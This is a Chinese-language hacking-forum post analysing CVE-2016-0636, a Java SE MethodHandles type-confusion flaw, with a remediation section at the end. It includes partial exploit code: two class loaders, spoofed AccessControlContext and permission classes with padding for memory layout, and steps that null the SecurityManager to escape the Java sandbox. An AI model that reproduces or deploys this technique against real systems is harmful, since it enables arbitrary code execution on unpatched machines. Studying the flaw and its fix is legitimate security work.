HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: @w=无名
查看: 54|回复: 0

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-26Mysql下UDF提权2017年中旬WEB渗透系列课程-26Mysql下UDF提权
2017年中旬WEB渗透系列课程-25基于php参数开关的提权2017年中旬WEB渗透系列课程-25基于php参数开关的提权
2017年中旬WEB渗透系列课程-24提权分类2017年中旬WEB渗透系列课程-24提权分类
2017年中旬WEB渗透系列课程-23提权认识2017年中旬WEB渗透系列课程-23提权认识
2017年中旬WEB渗透系列课程-22CMS相关2017年中旬WEB渗透系列课程-22CMS相关
2017年中旬WEB渗透系列课程-21webshell免杀相关问题2017年中旬WEB渗透系列课程-21webshell免杀相关问题
2017年中旬WEB渗透系列课程-20关于指令执行2017年中旬WEB渗透系列课程-20关于指令执行
2017年中旬WEB渗透系列课程-19文件包含与目录遍历2017年中旬WEB渗透系列课程-19文件包含与目录遍历
2017年中旬WEB渗透系列课程-18上传绕过方法演示2017年中旬WEB渗透系列课程-18上传绕过方法演示
2017年中旬WEB渗透系列课程-17了解上传检测方式2017年中旬WEB渗透系列课程-17了解上传检测方式

Oracle out-of-band release for Java SE Vulnerability

[复制链接]
@w=无名 发表于 7 天前 | 显示全部楼层 |阅读模式
查看: 54|回复: 0
0)漏洞简介
漏洞编号:CVE-2016-0636,此漏洞是安全研究员(Adam Gowdiak)于2013年报告给Oracle的漏洞(CVE-2013-5838)的变体。由于Oracle在部分代码分支中未对该漏洞进行修补,导致了此漏洞再现江湖,影响版本:java SE 7u97, 8u73, 8u74。

1)测试环境

2)漏洞分析
由于反射API的实现存在缺陷,当方法句柄(MethodHandles)处理目标类的成员函数时,因对函数参数的类型校验不严谨,可导致类型混淆。校验过程如下图所示:
其中clazz代表目标类,type代表clazz类的成员函数,具体验证代码如下图所示:
其中loadersAreRelated的实现代码如下:
  1. @param paramClassLoader1 函数参数的加载器
  2. @param paramClassLoader2 目标类的加载器
  3. private static boolean loadersAreRelated(ClassLoader paramClassLoader1, ClassLoader paramClassLoader2, boolean paramBoolean)
  4. {
  5.     ...
  6.     for (ClassLoader localClassLoader = paramClassLoader2; localClassLoader != null; localClassLoader = localClassLoader.getParent()) {

  7.     if (localClassLoader == paramClassLoader1) {

  8.         return true;

  9.         }

  10.     }
  11.     ...
  12. }
复制代码
该函数循环检查目标类的加载器或者父加载器是否与函数参数的加载器相等,如果相等直接返回true,表示验证通过。当目标类的加载器与其函数参数的加载器不一致,并且两个加载器存在父子关系时,就形成了类型混淆的漏洞。

3)漏洞利用
  • JAVA类加载规则:JVM在加载类时默认采用的是双亲委派机制,通俗的讲,就是某个特定的类加载器在接到加载类的请求时,首先将加载任务委托给父类加载器,依次递归,如果父类加载器可以完成此类的加载任务,就成功返回;只有父类加载器无法完成此加载任务时,才会自己去加载该类。如下图所示



漏洞触发条件:定义void A.m(P p),A表示目标类、m表示函数、p表示参数;A由cl2加载;p由cl1加载,并且cl1 是cl2 的父加载器(其中p可以在cl1空间伪造,因为正常情况下p应该由cl2加载)




为了满足1、2条件,构造POC代码如下:
  1. URLClassLoader cl1=(URLClassLoader)getClass().getClassLoader();
  2. URL utab[]=cl1.getURLs();
  3. URL url=new URL(utab[0]+"/data/");
  4. utab=new URL[1];
  5. utab[0]=url;
  6. URLClassLoader cl2=URLClassLoader.newInstance(utab,cl1);
  7. /* find A classe in cl2 namespace */
  8. MethodHandles.Lookup lookup=MethodHandles.lookup();
  9. Class a_cl2=cl2.loadClass("A");
  10. /* find m method of A class */
  11. lookup=lookup.in(a_cl2);
  12. Class ctab[]=new Class[1];
  13. ctab[0]=P.class;
  14. desc=MethodType.methodType(Void.TYPE,ctab);
  15. MethodHandle mh=lookup.findStatic(a_cl2,"m",desc);//获取m函数的方法句柄
  16. P p = new P();
  17. mh.invokeExact(p);
复制代码
  • 漏洞利用思路:伪造p来达到对象混淆的目的,通过合理的内存布局,读写目标对象的内存数据,将安全沙箱管理器设置为null,从而绕过安全沙箱限制,执行任意代码。
  • 利用代码分析: 通过类型混淆,改写当前系统权限集为用户自定义的权限集,自定义的权限集会返回一个空集。当安全沙箱管理器被置为null时,会调用系统权限集合进行安全检查,但此时系统权限集已被篡改为用户自定义的权限集,所以返回空,安全权限检查通过,成功将安全管理器置为null,从而绕过安全沙箱的限制。
    • 构造两个名称一样的类A作为p,一个在cl1空间,另一个在cl2空间,为类混淆做准备,代码如下:
      1. A in cl1 namespace
      2. public class A {
      3. public AccessControlContext macc;
      4. }
      复制代码
      1. A in cl2 namespace
      2. public class A {
      3. public MyAccessControlContext macc;
      4. }
      复制代码
      用户自定义的MyAccessControlContext用于获取context,代码如下:
      1. public class MyAccessControlContext {
      2. int dummy;
      3. public MyProtectionDomain context[];
      4. }
      复制代码
      其中dummy为填充的数据,用于占位来控制内存布局。致使MyAccessControlContext.context恰好等于AccessControlContext.content。内存布局如下所示:
  1. macc in cl1            macc in cl2
  2. 03ca56d0 00000001  ---> 03caa940 00000001
  3. 03ca56d4 1480e188  ---> 03caa944 143e1438
  4. 03ca56d8 00000100  ---> 03caa948 41414141 //dummy
  5. 03ca56dc 03ca56c0  ---> 03caa94c 03cab6b8 //content
  6. 03ca56e0 00000000
  7. 03ca56e4 00000000
  8. 03ca56e8 00000000
  9. 03ca56ec 00000000
  10. 03ca56f0 00000000
  11. 03ca56f4 00000000
复制代码
用户自定义的MyPermissions权限集合类,会返回一个空集合。代码如下:

  1. public class MyPermissions extends PermissionCollection implements Serializable {
  2. Object dummy;//用于占位来控制内存布局
  3. public transient boolean hasUnresolved;
  4. public PermissionCollection allPermission;
  5. public Enumeration elements() {

  6. return null;

  7. }
  8. public boolean implies(Permission perm) {
  9. return true;
  10. }
  11. public void add(Permission permission) {
  12. }
  13. }
复制代码
将系统权限集合设置为自定义权限集合,代码实现如下:
  1. public static void set_privileges(MyAccessControlContext macc) {
  2. try {
  3. MyProtectionDomain mpd=macc.context[0];

  4. MyPermissions permissions=mpd.permissions;//转换成自定义权限集

  5. permissions.allPermission=(PermissionCollection)permission;/设置系统权限集为自定义权限集
  6. } catch(Throwable e) {e.printStackTrace();}
  7. }
复制代码
逻辑实现步骤
  • 将cl1中的系统权限集设为用户自定义的权限集合;
  • 将cl2中的系统权限集设为用户自定义的权限集合;
  • 在cl2执行方法将安全管理器设置null。关键代码如下:
  1. /* exploit type confusion for ACC from cl1 namespace                   */
  2. a.macc=AccessController.getContext();

  3. confuse_types_mh.invokeExact(a);//cl1 空间对象混淆,篡改权限集合
  4. /* exploit type confusion for ACC from cl2 namespace                   */
  5. a.macc=(AccessControlContext)getACC_mh.invoke();

  6. confuse_types_mh.invokeExact(a);//cl2 空间对象混淆,篡改权限集合
  7. /* invoke Exploit.run method and proceed with full sandbox bypass      */
  8. run_mh.invokeExact()//将安全管理器设置null,执行任意代码;
复制代码
4)利用演示
利用该漏洞绕过了安全沙箱的限制,成功弹出计算器,如下图所示:
5)漏洞修补方案
保证目标类的加载器和函数参数类的加载器为同一加载器即可,修补代码如下:
  1. @param paramClass1 函数参数类
  2. @param paramClass2 目标类
  3. public static boolean isTypeVisible(Class<?> paramClass1, Class<?> paramClass2)
  4.   {
  5.     ...
  6.     String class1Name = paramClass1.getName();

  7.     Class localClass = (Class)AccessController.doPrivileged(new PrivilegedAction()

  8.     {

  9.       public Class<?> run()

  10.       {

  11.         try

  12.         {

  13.           return Class.forName(class1Name, false, localClassLoader2);

  14.         }

  15.         catch (ClassNotFoundException|LinkageError localClassNotFoundException) {}

  16.         return null;

  17.       }

  18.     });

  19.     return paramClass1 == localClass;
  20.   }
复制代码
首先获取参数类的名称,然后让目标类加载器尝试加载参数类。如果加载成功,并且判断两个类是否相等,如果相等,则验证通过,否则验证失败。这样就保证了目标类的加载器和函数参数类的加载器为同一加载器,成功修补漏洞。

6)exp下载地址
7)参考链接


本帖子中包含更多资源

正式会员需要 登录 才可以下载或查看,没有帐号?立即注册

x
正式会员需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|小黑屋|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-10-19 15:07 , Processed in 0.059738 second(s), 29 queries .

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.